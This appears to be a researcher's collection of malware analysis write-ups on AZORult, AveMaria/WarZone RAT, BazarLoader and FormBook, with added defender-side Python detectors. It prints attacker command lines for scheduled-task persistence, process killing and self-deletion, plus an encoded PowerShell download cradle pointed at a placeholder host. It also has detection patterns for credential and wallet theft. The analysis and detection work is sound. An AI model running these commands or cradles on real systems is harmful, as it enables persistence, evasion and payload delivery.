```
├── AZORult
│   └── AZORult.md
├── AveMAriaRAT | WarZoneRAT
│   └── AveMariaRAT-WarZoneRAT.md
├── BazarLoader
│   └── A js Downloader - BazarLoader.md
├── FormBook
│   └── FormBook.md
├── LaplasClipper
│   └── LaplasClipper.md
├── Macros
│   └── A macro downloader.md
├── PDF
│   └── A phishing PDF downloader.md
├── RAT
│   ├── NanoCore
│   │   └── A VBS loader of NanoCore.md
│   └── Readme
├── README.md
├── Ransomware
│   ├── RagnarLocker
│   │   └── Quick view RagnarLocker.md
│   └── Readme
├── RecordBreaker
│   └── RecordBreaker.md
├── SilentBuilder
│   └── SilentBuilder.md
├── SmokeLoader
│   └── SmokeLoader.md
├── SysJoker
│   ├── A new Backdoor: SysJoker.md
│   └── Readme
└── Tofsee
    └── Tofsee backdoor.md
```

/AZORult/AZORult.md:
--------------------------------------------------------------------------------
# _Overview

_AZORult is one of the best-known malware families within the Stealer category. It is usually sold on Russian forums for prices of up to $100. This malware has been used by a large number of important threat actors, including some dedicated to crime such as FIN11 or TA505 (GracefulSpider), and others that operate under a state-sponsored model such as GorgonGroup from Pakistan._

_This malware usually starts from an initial point such as documents delivered via Spear-Phishing or compromised web pages. It is characterized by dropping different files that are later executed and that check the connection to the C&C; after this, it steals information and creates persistence or a backdoor so that, before exfiltrating the data, it has the opportunity to persist on the system and the actor can keep obtaining information from the system to which the affected computer belongs, and sometimes pivot._

# _Technical Analysis

As mentioned above, this malware is most commonly found after Spear-Phishing or a compromised web site. After this, its main objective is to obtain data from elements such as search engines, FTP or email.
An example of what its steps would be is as follows:

![image](https://user-images.githubusercontent.com/91592110/224556672-90418d79-8cd2-4e0a-b6d8-12f6a0d6fb19.png)

Once we have a general understanding of what this malware is and what its steps are, we look at how several samples execute in order to get the widest possible context, since, being a malware that several groups use and that can be bought, we find different versions of AZORult coexisting.

After reviewing dozens of samples, the most common pattern is a first phase in which it launches several cmd.exe processes to support its execution while dropping other files in temporary paths, or uses sleeps through PowerShell to outlast the sandbox analysis timeout or delay execution.

![image](https://user-images.githubusercontent.com/91592110/224557218-f12f529b-0504-4c20-8c6e-de773316e5ab.png)

During this phase, different files are launched in the background from folders such as:

```
C:\Users\\AppData\*\Temp|Roaming
C:\ProgramData
C:\Users\\
```

Here we will see different files among which, depending on the version, we can find scripts and other binaries that support the execution or the next file, which will be AZORult itself.

Before the execution of the Stealer, depending on the version, it performs different actions such as:

> Create scheduled tasks to establish persistence:

```
schtasks /create /tn /tr "" /sc minute /mo 1 /F
```

> Modify Office settings, where we can see changes to the Resiliency or the MRU (most recently used) entries, which means you will not be able to recover the Office files you had open and your Office history will disappear.
> In this case it was performed on Word, which suggests it is covering its tracks, since one of the samples came from Spear-Phishing.

![image](https://user-images.githubusercontent.com/91592110/224557923-144f20d2-a3ec-4a3f-ad33-2fc3a2e3794c.png)

> Killing other processes:

```
Taskkill /F /IM winword.exe
```

Or it runs AZORult itself, which is the final objective of its initial "Dropper" stage. It is worth noting that the AZORult samples seen were mostly either .NET obfuscated with SmartAssembly, AutoIT (the most common) or NullSoft; I also found some in C++.

![image](https://user-images.githubusercontent.com/91592110/224557733-9b213c37-b7bb-4df3-84e8-caddd9a03d07.png)

Once the stealer is deployed, it performs its actions in one way or another, since, as I said, several versions usually coexist at the same time. We can see how they usually have obfuscation and/or anti-analysis techniques.

![image](https://user-images.githubusercontent.com/91592110/224558128-eaed7574-a10d-48f1-b7d5-ca517d792d47.png)

We can see anti-debugging checks where it looks for whether any thread is being debugged, or inspects the HEAP flags; in short, I have seen different ways of preventing us from analyzing it at a low level.

Subsequently, we can see how it tries to avoid reinfection with a Mutex, but not all samples used the mutex.
![image](https://user-images.githubusercontent.com/91592110/224558271-4effb092-e566-4158-846c-3056f964f70f.png)

During the rest of the execution, I notice how it actually tries to check at several points which processes are running on the system, usually linked to anti-analysis as well, since it allows it to see whether any applications it does not want running are present.

![image](https://user-images.githubusercontent.com/91592110/224558344-9f31784c-3927-45b2-ad39-a147198542f2.png)

Later it looks up the permissions it has at execution time via its Token, in order to then be able to execute elements in a different thread with the context from which it has obtained all the information related to the credentials of the main process.

![image](https://user-images.githubusercontent.com/91592110/224558593-d72e2364-d89e-4f0f-bd8b-3ca1b3e8043c.png)

In other words, it can check whether the running process (thread) has enough privileges to take the thread context and execute whatever it wants in that thread with the same privileges, or with the privileges of another user :)

I also find quite interesting the ability to control the device by remotely shutting it down or suspending it using the Suspend + Force flag.

![image](https://user-images.githubusercontent.com/91592110/224559188-d6dc4fb4-e33c-4e7e-bd87-65ebc095e2d0.png)

![image](https://user-images.githubusercontent.com/91592110/224559201-4f586858-a1fe-46c5-9264-b02467f898f5.png)

In the meantime, we must not forget the most important part here, which is the information theft, where across different samples we can see that it obtains information from elements such as:

* Mail information
* Wallets
* FTP
* Browser information (Cookies, History...)
* SSH (Putty|WinSCP)

![image](https://user-images.githubusercontent.com/91592110/224559341-381f2024-c36a-4977-a4b7-66970b6c5db8.png)

Once it has obtained everything it wanted, it makes requests to the C&C with all the data it has collected. It is worth noting that most samples of AZORult I have found had a check, before running most of their functions, of whether the C2 was reachable; if it was not, execution stopped automatically. This is quite common because it ensures that, if analysts focus on the sandbox and the C2 goes down, we cannot analyze the content of what comes next, besides adding an extra layer of protection, as analysts sometimes analyze malware without internet traffic.

![image](https://user-images.githubusercontent.com/91592110/224560382-e12c1e15-a931-4261-91ed-790d33a5fa18.png)

I have found myself analyzing quite a few samples that no longer had a C2, and I have had to bypass the checks or directly understand what it was doing from the disassembly with the context of the rest of the samples, since, as you know, C&Cs come and go and usually fall relatively quickly thanks to the great work done by the community and the companies reporting them.
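A defender-side check for the dropper behaviours described in this analysis and its behaviour summary (the every-minute scheduled task, the Office Resiliency/MRU changes launched from an Office or temp-folder parent, the winword.exe kill and the timeout/ping self-deletion), written as an added example that is not part of the original write-up. The tab-separated event layout, the user and task names and the sample events are constructed for the example.

```python
"""Command-line rules for the AZORult dropper behaviours described in the write-up.

Added example, not code from the original analysis. The process-creation event
layout (parent image, image, command line, tab-separated) and the sample events
are assumptions made for the example, not a real EDR export.
"""
import re
from dataclasses import dataclass

OFFICE_PARENTS = {"winword.exe", "excel.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}

# A parent binary living in one of these folders is the "TempFile" parent of the summary.
TEMP_DIR_RE = re.compile(r"\\(?:AppData\\Local\\Temp|AppData\\Roaming|ProgramData)\\", re.I)

# "(cmd contains) \Resiliency /f" and "\File MRU /v"; only meaningful from an Office/temp parent.
OFFICE_TAMPER_RE = re.compile(r'\\Resiliency"?\s+/f\b|\\File MRU"?\s+/v\b', re.I)

# Rules that fire on the command line alone: (rule name, pattern).
GENERIC_RULES = [
    ("persistence_minute_task",
     re.compile(r"schtasks(?:\.exe)?\s+/create\b.*?/sc\s+minute\s+/mo\s+1\b.*?/F\b", re.I)),
    ("kill_office_process",
     re.compile(r"taskkill(?:\.exe)?\s+/F\s+/IM\s+winword\.exe", re.I)),
    ("self_delete_via_timeout_or_ping",
     re.compile(r"(?:timeout(?:\.exe)?\s+\d+\s*&|ping\s+127\.0\.0\.1\b[^&]*&&)\s*del\b", re.I)),
]


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_event(line: str) -> ProcEvent:
    """One tab-separated event line -> ProcEvent (command lines never contain tabs)."""
    parent, image, cmd = line.rstrip("\r\n").split("\t", 2)
    return ProcEvent(parent, image, cmd)


def classify(ev: ProcEvent) -> list[str]:
    """Return the names of every rule the event matches (empty list if none)."""
    hits = []
    suspicious_parent = (basename(ev.parent_image) in OFFICE_PARENTS
                         or TEMP_DIR_RE.search(ev.parent_image) is not None)
    # Office manipulation: Office or temp-folder parent -> shell -> Resiliency / File MRU edit.
    if (basename(ev.image) in SHELLS and suspicious_parent
            and OFFICE_TAMPER_RE.search(ev.command_line)):
        hits.append("office_resiliency_or_mru_tamper")
    for name, pattern in GENERIC_RULES:
        if pattern.search(ev.command_line):
            hits.append(name)
    return hits


def scan(lines) -> list[list[str]]:
    """Classify every non-empty event line, preserving order."""
    return [classify(parse_event(line)) for line in lines if line.strip()]


# Constructed events (not real telemetry); user, task and file names are made up.
SAMPLE_EVENTS = [
    (r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", r"C:\Windows\System32\cmd.exe",
     r"cmd.exe /c reg delete HKCU\Software\Microsoft\Office\16.0\Word\Resiliency /f"),
    (r"C:\Users\user\AppData\Local\Temp\setup.exe", r"C:\Windows\System32\schtasks.exe",
     r'schtasks /create /tn Updater /tr "C:\Users\user\AppData\Roaming\svc.exe" /sc minute /mo 1 /F'),
    (r"C:\Users\user\AppData\Local\Temp\setup.exe", r"C:\Windows\System32\cmd.exe",
     r'cmd.exe /c ping 127.0.0.1 && del "C:\Users\user\AppData\Local\Temp\setup.exe" >> NUL'),
    (r"C:\Users\user\AppData\Local\Temp\setup.exe", r"C:\Windows\System32\taskkill.exe",
     r"Taskkill /F /IM winword.exe"),
    # Benign: an interactive shell and a daily backup task.
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", r"cmd.exe /c dir"),
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\schtasks.exe",
     r'schtasks /create /tn Backup /tr "C:\Tools\backup.exe" /sc daily /st 02:00'),
]
SAMPLE_LINES = ["\t".join(ev) for ev in SAMPLE_EVENTS]

if __name__ == "__main__":
    for ev, hits in zip(SAMPLE_EVENTS, scan(SAMPLE_LINES)):
        print(hits or "-", "<-", ev[2])
```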
Finally, VT is usually checked to see how the samples I am analyzing relate to each other, whether they lead me to IPs/domains that are widely reported, to find more samples and therefore different versions, and to see whether there is any collection from which I can get more context from the intelligence side, and so on.

![image](https://user-images.githubusercontent.com/91592110/224560624-6703aef0-ad96-47a7-b803-2f7965d50380.png)

# _Summary of behaviour

Chain:

```
Dropper > Infection > C2 communication > Information theft > Persistence and backdoor creation > Encryption > Data exfiltration
```

Office Manipulation:

```
(PrntPrc) Winword|Excel | TempFile > (ChildPrc) cmd.exe | powershell.exe > (cmd contains) \Resiliency /f
(PrntPrc) Winword|Excel | TempFile > (ChildPrc) cmd.exe | powershell.exe > (cmd contains) \File MRU /v
```

Persistence:

```
(Cmd) schtasks /create /tn /tr "" /sc minute /mo 1 /F
```

Timeout | Ping abuse to auto-delete:

```
(Cmd) cmd.exe /c C:\Windows\system32\timeout.exe 3 & del ""
(Cmd) cmd.exe /c ping 127.0.0.1 && del "C:\Users\admin\AppData\Local\Temp\\.exe" >> NUL
```

Suspicious file reading sensitive information:

```
(Path Temp|Roaming|ProgramData)Prc > ReadFile > (Path contains) \Wallet\ | \Wallets\ | \Recentservers.xml | \accounts.xml
(Path Temp|Roaming|ProgramData)Prc > QueryReg > (Reg contains) \monero | \Bitcoin | \BitCore | \LiteCoin | \WinSCP | \Url History
```

# _IOC

> :t-rex: [vc0=Rexor](https://github.com/vc0RExor) :detective:

--------------------------------------------------------------------------------
/AveMAriaRAT | WarZoneRAT/AveMariaRAT-WarZoneRAT.md:
--------------------------------------------------------------------------------
# _Overview

_AveMariaRAT, also known as WarZoneRAT, is one of the most famous and widely used RATs of recent years. It can be purchased with a license and monthly subscriptions ranging from $16 to $38 on its website.
This tool is used and modified by various groups, ranging from disorganized or resource-limited individuals known as script kiddies to highly relevant criminal groups or APTs._

_Some of the notable groups that have been observed using AveMariaRAT include:_

* Tomiris ( 🏴 )
* Carbanak | Anunak ( 🇺🇦 )
* Aggah ( 🏴 )
* BlindEagle | APT-C-36 ( 🇨🇴 )
* Confucius ( 🇮🇳 )
* SideWinder ( 🇮🇳 )
* HazyTiger | Bitter ( 🇮🇳 )
* FIN7 ( 🏴 )
* SandWorm Team | Voodoo Bear ( 🇷🇺 )
* Kasablanka ( 🏴 )

_This malware, used by the groups mentioned, can infiltrate an infrastructure in various ways, from Spear-Phishing to compromised websites from which it is downloaded. Once on our devices, the RAT has capabilities to escalate privileges, bypass UAC, evade defenses such as security software, gather sensitive information about the device and the user, and inject itself into processes to maintain active communication with the C&C server operated by the attacker._

# _Technical Analysis

As I mentioned earlier, the threat actor commonly uses compromised emails or web pages with the ultimate goal of getting you to download or execute the malware sample after passing stage number 1.
An example step-by-step process, drawn from various samples I have analyzed from different versions of AveMariaRAT, could be as follows:

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/7b0fd7ea-31b3-4e3f-918f-6a22cd64e22a)

The executions vary greatly depending on the version, but typically it first tries to determine whether it is already running on the machine using a Mutex.

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/0839fa96-a46f-485f-b1a1-44cac58f1697)

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/4a9ea3be-b4f3-47b9-ae45-1e2967427a1e)

After that, it can perform anti-debugging/anti-VM tasks or directly check for security software that may be installed on the system.

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/619ef405-4c83-4a9f-a9fe-785684b27f5e)

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/bd1a6e15-ee06-48f3-8dd7-d0d62b513864)

A common practice in AveMaria RAT is privilege escalation or bypassing UAC. The most common method involves abusing sdclt.exe, which, similarly to CompMgmtLauncher (the Windows console), searches for a library or component in a registry key that is normally not present.
This is exploited for hijacking by introducing a library that will be loaded; since these binaries usually have the capability to auto-elevate, they execute with higher privileges and thus run the malware with the desired privileges.

Here you can see the parallel with a PoC I made some time ago, and we can see that it seeks the same thing in both cases:

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/b72185d5-ad06-4245-a594-b0e234cedd40)

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/5796da24-e061-4dba-ac08-d771a9c7dfa0)

The overall picture of how this is done with sdclt is as follows:

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/5cbc41c7-9720-4e12-bfb4-e27476a6fb7b)

Depending on the sample, there is usually a subsequent resource load for the injection. This can be found in the resource section of the binary and, as seen, it checks whether you are already an administrator, so the previous step should have been executed.

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/311152d1-cecb-45cc-b9d7-3102106e3eb5)

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/5ab64b8a-c286-4e63-94b1-3d2d19d21703)

A common practice I have observed in WarZone RAT is modifying network elements, as well as keys such as _\CurrentVersion\Internet Settings_, where it increases the maximum number of simultaneous connections to a server. The objective of this is evident.

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/e37b4a51-e562-4b72-a543-c2e9550fee7d)

Additionally, it is also quite common to see the modification of Zone.Identifier, which allows the attacked machine to receive malicious files from untrusted sources. In other contexts, the connection would be rejected or flagged as an unadvisable request.
However, after the modification, the malware can send and execute any type of file, bypassing any previous warning or restriction.

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/62fe4010-fdb8-4d70-8ba8-1dbad1a58c4a)

Furthermore, it is also common for the malware to make changes to the security checks of certain browsers, such as Internet Explorer (IE). By changing the registry key, it can increase access to certain addresses to complement its previous behavior.

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/3268f312-3a1b-4883-9ef8-4e1cde5e9c51)

After this, it is common for the malware to establish persistence. Depending on the sample, it may create a copy of itself and then add the path to the \CurrentVersion\Run (or similar) registry key, or it may leave a copy of itself or a script in a startup folder that will be executed at system startup.

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/e331bb0a-b437-476b-b59a-4d51b7dc2df5)

In some samples, I frequently observe the modification of folder attributes where the malware launches its copies or the files it intends to use or execute. It is common to launch them in a folder such as Documents or Downloads and modify the attributes to point to another location, such as ApplicationData or ProgramData. For example, it would be seen as Documents:ApplicationData. This action allows the malware to evade restrictions or security policies of the initial folder where the files are launched and potentially remain undetected. The telemetry data always reflects this pattern:

```
:
```
![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/a9aeac68-5c88-40af-9cff-7cc3d9ae40b0)

During the analysis of different samples, I notice the consistent use of various anti-debugging techniques along with frequent sleep commands that significantly slow down debugging.
This forces me to bypass them entirely.

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/9d37ae62-f70a-4340-986a-0ef007d5bce4)
![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/ac9ae255-665f-4e65-9472-3ae1bfb3a72f)
![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/d899c227-b042-4e23-bece-440be9eafe76)

Once the sample has achieved persistence, the files have been launched in the desired folder and the appropriate privileges have been obtained, it commonly proceeds with the injection process. Injection serves multiple purposes: to remain hidden, to complicate analysis, and to ensure better persistence by residing within the target process. If the process being injected into has elevated privileges, the injected code will also inherit those privileges.

Here we can see different injections performed by this RAT depending on the build. Commonly, it extracts the code from a specific section and reconstructs it in memory for subsequent injection. Alternatively, it may assemble or deobfuscate the code from a resource. The target process varies depending on the sample, but I have observed processes related to .NET (such as AppLaunch, csc, RegAsm...) or the RAT itself (either a sample launched with a different name in another folder, or self-executing and injecting).

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/2ec84d3b-b39b-4aa0-a0a3-1d8fe0e8d858)

After this, the malware payload will be within another process and can act more freely. At this point, the most common action is to gather relevant information about the device and/or the user, such as the operating system type, machine name, language used, etc.

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/69179cec-8458-4aeb-bc6e-dfe68fe6b39d)

Once the previous steps have been completed, the attacker focuses on establishing an external connection.
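Before the C2 phase, the registry changes described above (the Run-key persistence pointing at a dropped copy, the Internet Settings connection-limit increase, the Zone.Identifier handling and the IE zone settings edits) are what a defender can key on. The following is an added example, not code from the original write-up: it runs those rules over constructed registry-set events. The event layout, paths and value data are assumptions made for the example; the value names MaxConnectionsPerServer / MaxConnectionsPer1_0Server and the Policies\Attachments\SaveZoneInformation policy are the standard Windows settings behind the behaviours the text describes, which the text itself does not name.

```python
"""Registry-write rules for the AveMaria/WarZone behaviours described in the write-up.

Added example, not code from the original analysis. RegSetEvent, the sample
events and their values are constructed for the example.
"""
import re
from dataclasses import dataclass

# Folders a standard user can write to; a Run entry or a writer living here is suspicious.
USER_WRITABLE_RE = re.compile(
    r"\\Users\\[^\\]+\\(?:AppData\\(?:Local\\Temp|Roaming|Local)|Documents|Downloads)\\|\\ProgramData\\",
    re.I)
BROWSERS = {"iexplore.exe", "msedge.exe", "chrome.exe", "firefox.exe"}
# Standard Internet Settings values that hold the per-server connection limit.
CONNECTION_LIMIT_VALUES = {"maxconnectionsperserver", "maxconnectionsper1_0server"}


@dataclass(frozen=True)
class RegSetEvent:
    writer_image: str   # process that wrote the value
    key: str            # full key path, e.g. HKCU\Software\...\CurrentVersion\Run
    value_name: str
    data: str           # string form of the data written


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: RegSetEvent) -> list[str]:
    """Return the names of every rule the event matches (empty list if none)."""
    hits = []
    key = ev.key.lower()
    writer = basename(ev.writer_image)

    # Persistence: Run/RunOnce entry pointing at a copy dropped in a user-writable folder.
    if re.search(r"\\currentversion\\run(?:once)?$", key) and USER_WRITABLE_RE.search(ev.data):
        hits.append("run_key_to_user_writable_path")

    # Network: raising the per-server connection limit from anything that is not a browser.
    if (key.endswith("\\currentversion\\internet settings")
            and ev.value_name.lower() in CONNECTION_LIMIT_VALUES and writer not in BROWSERS):
        hits.append("internet_settings_connection_limit_raised")

    # Zone.Identifier: SaveZoneInformation=1 stops the mark-of-the-web being kept on downloads.
    if (key.endswith("\\policies\\attachments")
            and ev.value_name.lower() == "savezoneinformation" and ev.data.strip() == "1"):
        hits.append("zone_identifier_policy_disabled")

    # Browser security: IE zone settings edited by a non-browser process.
    if "\\internet settings\\zones\\" in key and writer not in BROWSERS:
        hits.append("ie_zone_setting_tamper")

    # Any hit produced by a binary running from a user-writable folder is a stronger signal.
    if hits and USER_WRITABLE_RE.search(ev.writer_image):
        hits.append("writer_in_user_writable_folder")
    return hits


def scan(events) -> list[list[str]]:
    """Classify events in order."""
    return [classify(ev) for ev in events]


# Constructed events (not real telemetry); names, paths and values are made up.
SAMPLE_EVENTS = [
    RegSetEvent(r"C:\Users\user\AppData\Roaming\images.exe",
                r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
                "images", r"C:\Users\user\AppData\Roaming\images.exe"),
    RegSetEvent(r"C:\Users\user\AppData\Roaming\images.exe",
                r"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings",
                "MaxConnectionsPerServer", "10"),
    RegSetEvent(r"C:\Users\user\AppData\Roaming\images.exe",
                r"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments",
                "SaveZoneInformation", "1"),
    # Benign: the browser adjusting its own zone setting, and a vendor updater in Program Files.
    RegSetEvent(r"C:\Program Files\Internet Explorer\iexplore.exe",
                r"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3",
                "ExampleSetting", "3"),
    RegSetEvent(r"C:\Program Files\Vendor\Updater\updater.exe",
                r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run",
                "VendorUpdater", r"C:\Program Files\Vendor\Updater\updater.exe"),
    RegSetEvent(r"C:\Users\user\AppData\Roaming\images.exe",
                r"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3",
                "ExampleSetting", "0"),
]

if __name__ == "__main__":
    for ev, hits in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        print(hits or "-", "<-", ev.key, ev.value_name)
```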
Typically, the malware will have several addresses to try. It will commonly attempt to establish a connection by opening a socket to the chosen address. In the samples I have analyzed, I have observed that the malware often enters a loop in which it attempts to connect to the different domains on its list at regular intervals. The malware then remains waiting for instructions from the command and control (C&C) server.

![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/000c8f31-7b81-44ad-b145-0da187865539)

Once the connection is established, the attacker has achieved the desired objective: malware injected into a process, whether legitimate or not, from which they can operate. They have modified network parameters, dealt with security software, obtained data about the target system, and established persistence for each system login.

# _TTP

```
[TA0003][T1060] - Persistence using startup folder
[TA0003][T1060] - Persistence using CurrentVersion\Run registry key
[TA0005][T1089] - AV software check
[TA0009][T1056] - Steal sensitive information
[TA0007][T1057] - Check language
[TA0005][T1497] - Anti-analysis techniques
[TA0005][T1055] - Process injection
[TA0004][T1548] - UAC bypass abusing sdclt
[TA0005][T1055] - Load binary from resources
[TA0005][T1112] - Increase the max. connections to a server abusing Internet Settings
```

# _IOC

Thank you very much for reading, happy hunting :)

> :t-rex: [vc0=Rexor](https://github.com/vc0RExor) :detective:

--------------------------------------------------------------------------------
/BazarLoader/A js Downloader - BazarLoader.md:
--------------------------------------------------------------------------------
# _Overview

_BazarLoader is known to be used in campaigns by cybercriminal groups such as WizardSpider to perform what is commonly known as Initial Access (TA0001), usually
sending emails containing malicious documents or scripts with the objective of downloading or executing malware such as Ransomware._

# _Technical Analysis

We start from a script, specifically JavaScript (JS), that could be delivered through a fake ZIP used in phishing campaigns, in which a fake file with the appearance of a document or an archive is introduced together with an invitation message, a UPS/FedEx mail, and so on. That will make us download it and have it on disk, which is its main stage for achieving its next steps.

The file is quite obfuscated, but we focus on the possibility of an eval that will launch the content, or part of the content, of the script.

![image](https://user-images.githubusercontent.com/91592110/139117972-f89cdb86-d476-4225-a1a9-fe589e9cfa4f.png)

![image](https://user-images.githubusercontent.com/91592110/139118019-e0f37dfc-396c-4f25-955d-39ffcea28596.png)

After executing the JS, it tries to open a shell and execute an encoded PowerShell command; it tries to make a request to a malicious URL which, by means of an _IEX_ (Invoke-Expression), will execute a download using _"downloadstring"_.

![2](https://user-images.githubusercontent.com/91592110/139118829-c6e74179-b738-4965-97bc-0bcbd8401201.png)

We can see that this URL [_hxxp://menoiras[.]space_] is related to different malicious files and has been reported by several entities.

![image](https://user-images.githubusercontent.com/91592110/139119166-52c5ec05-e6d5-41cf-9501-c79523392660.png)

![image](https://user-images.githubusercontent.com/91592110/139119176-f3f9f7e9-325d-4207-952d-09446ea0077f.png)

We also see that the download goes through 2 points: first it will try to perform a download from the path index.php on the previous URL which, as we see, will download a _.dat_ file into temp from _main.php_, and then it will run _rundll32.exe_ on it, starting it with _StartW_, which will be a common export in the binary.
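A triage routine for the two stages just described (the encoded PowerShell that runs an _IEX_ over _downloadstring_, and the _rundll32.exe_ launch of a _.dat_ from temp via the _StartW_ export), written as an added example that is not part of the original write-up. The command lines, the placeholder domain (example.invalid rather than the real one above) and the file names are constructed; the encoded command is built from its plaintext inside the example so the decoding step is visible.

```python
"""Decode and triage the encoded-PowerShell and rundll32 stages of the BazarLoader chain.

Added example, not code from the original analysis. The command lines, the
placeholder URL and the .dat name are constructed for the example.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import Optional

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_ARG_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)
# IEX / Invoke-Expression combined with a WebClient DownloadString/DownloadFile call.
DOWNLOAD_CRADLE_RE = re.compile(r"\b(?:iex|invoke-expression)\b.*\bdownload(?:string|file)\b", re.I | re.S)
# rundll32 <path>.dat,StartW with or without quotes around the path.
RUNDLL_RE = re.compile(r"rundll32(?:\.exe)?\s+\"?([^\",]+?\.dat)\"?\s*,\s*StartW\b", re.I)
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.I)


@dataclass
class Finding:
    stage: str
    urls: list = field(default_factory=list)
    dll_path: str = ""
    decoded: str = ""


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None if absent/invalid."""
    m = ENCODED_ARG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(cmdline: str) -> Optional[Finding]:
    """Classify one command line as the PowerShell download stage, the rundll32 stage, or nothing."""
    decoded = decode_encoded_command(cmdline)
    script = decoded if decoded is not None else cmdline  # inspect the decoded text when present
    if "powershell" in cmdline.lower() and DOWNLOAD_CRADLE_RE.search(script):
        return Finding("powershell_iex_downloadstring", urls=URL_RE.findall(script), decoded=script)
    m = RUNDLL_RE.search(cmdline)
    if m and TEMP_RE.search(m.group(1)):
        return Finding("rundll32_startw_from_temp", dll_path=m.group(1))
    return None


def encode_powershell(script: str) -> str:
    """Build the -EncodedCommand form the way PowerShell expects it (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed chain mirroring the write-up; the domain and file names are placeholders.
STAGE1_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/index.php')"
SAMPLE_CMDLINES = [
    "powershell.exe -nop -w hidden -enc " + encode_powershell(STAGE1_SCRIPT),
    r'rundll32.exe "C:\Users\user\AppData\Local\Temp\stage.dat",StartW',
    # Benign: a plain PowerShell command and a normal rundll32 invocation.
    "powershell.exe -Command Get-Process",
    r'rundll32.exe "C:\Windows\System32\shell32.dll",Control_RunDLL',
]

if __name__ == "__main__":
    for cmd in SAMPLE_CMDLINES:
        print(triage(cmd), "<-", cmd[:60])
```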
![image](https://user-images.githubusercontent.com/91592110/139119594-d49ce1e0-20c4-4734-8ca1-9552723b4b02.png)

We verify that the file we have in the captured package and the one we get from the download are indeed the same:

![4 1](https://user-images.githubusercontent.com/91592110/139121109-6d30758b-1221-4e19-b0ff-03ab52176598.png)

Subsequently, it executes the DLL using _rundll32.exe_; this DLL is commonly known as the BazarLoader backdoor (_BazarBackdoor_) and from here it will perform _CobaltStrike_ movements, so we can see anomalous traffic and reconnaissance phases on our computer, which could trigger a Ransomware that, considering the APT, could be Ryuk or Conti. Both this step and the previous one may change between versions, as variations of BazarLoader are used.

![image](https://user-images.githubusercontent.com/91592110/139120287-bb7a12f9-3e6e-482b-8f0a-dc647c11fde8.png)

In the phases after the infection via the PowerShell download, we can see different malware associated with this campaign, from Trickbot, through CobaltStrike and computer exploitation, to Ransomware in more advanced stages.

> :t-rex: [vc0=Rexor](https://github.com/vc0RExor) :detective:

--------------------------------------------------------------------------------
/FormBook/FormBook.md:
--------------------------------------------------------------------------------
# _Overview

_FormBook is a malware which has been used by different groups; it is mainly attributed to Cobalt Group | Cobalt Spider, although it has been used by others such as Sweed, groups dedicated to financial crime and espionage. FormBook being a backdoor and an InfoStealer, it has gained great notoriety in recent years.
In the waves of campaigns in which FormBook has been involved, it has been one of the most used means of access to infrastructures; the abuse of SpearPhishing (T1566.002) goes through different phases up to the connection with a C&C._

# _Technical Analysis

An outline of how the execution thread of a FormBook sample works would be as follows:

![image](https://user-images.githubusercontent.com/91592110/170861720-59f2ab8f-1c02-4811-aebe-45c9b58b9fc3.png)

This malware has variants, interspersed with injections, scripting, etc.

Once the attached document, commonly a DOCX/RTF or XLS, has been downloaded after the phishing, we obtain a file with macros or embedded objects.

![image](https://user-images.githubusercontent.com/91592110/170861747-531efec8-0a1b-4da5-b0e7-7a0abf5a2bd1.png)

Upon execution we would see an exploit of the Microsoft Office Equation Editor, CVE-2017-11882 (EQNEDT32.exe), which exploits the vulnerability by executing code outside of the process memory.

![image](https://user-images.githubusercontent.com/91592110/170861765-c766caed-e944-46d3-812d-9a6b4ffe1c98.png)

Immediately after exploitation, we observe how a file has been dropped in a temporary folder, usually TEMP or Roaming, which was downloaded by EQNEDT32 from a malicious domain.

![image](https://user-images.githubusercontent.com/91592110/170880101-bd3c9153-d356-46f8-b5c6-7068f3d4d2b7.png)

